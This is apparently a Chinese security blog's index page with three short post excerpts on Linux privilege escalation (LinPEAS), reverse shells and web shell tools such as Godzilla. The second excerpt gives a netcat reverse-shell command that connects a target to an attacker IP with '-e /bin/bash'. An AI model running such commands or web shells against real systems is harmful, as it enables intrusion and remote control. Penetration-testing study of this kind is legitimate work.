摘要: LinPEAS - Linux Privilege Escalation Awesome Script linxu 提权脚本 https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS 直接使用: CVEs Check Vulnerable 阅读全文
posted @ 2022-05-31 17:27 katago 阅读(2095) 评论(0) 推荐(0)
摘要: https://xz.aliyun.com/t/9488 攻击机开启本地监听: netcat -lvvp 2333 目标机主动连接攻击机: netcat 47.xxx.xxx.187 2333 -e /bin/bash # nc <攻击机IP> <攻击机监听的端口> -e /bin/bash bas 阅读全文
posted @ 2022-05-31 17:01 katago 阅读(68) 评论(0) 推荐(0)
摘要: https://www.freebuf.com/sectool/247104.html https://github.com/BeichenDream/Godzilla Web shell 与 冰蝎、蚁剑、哥斯拉(新手必看) https://blog.csdn.net/weixin_54161921 阅读全文
posted @ 2022-05-31 16:17 katago 阅读(650) 评论(0) 推荐(1)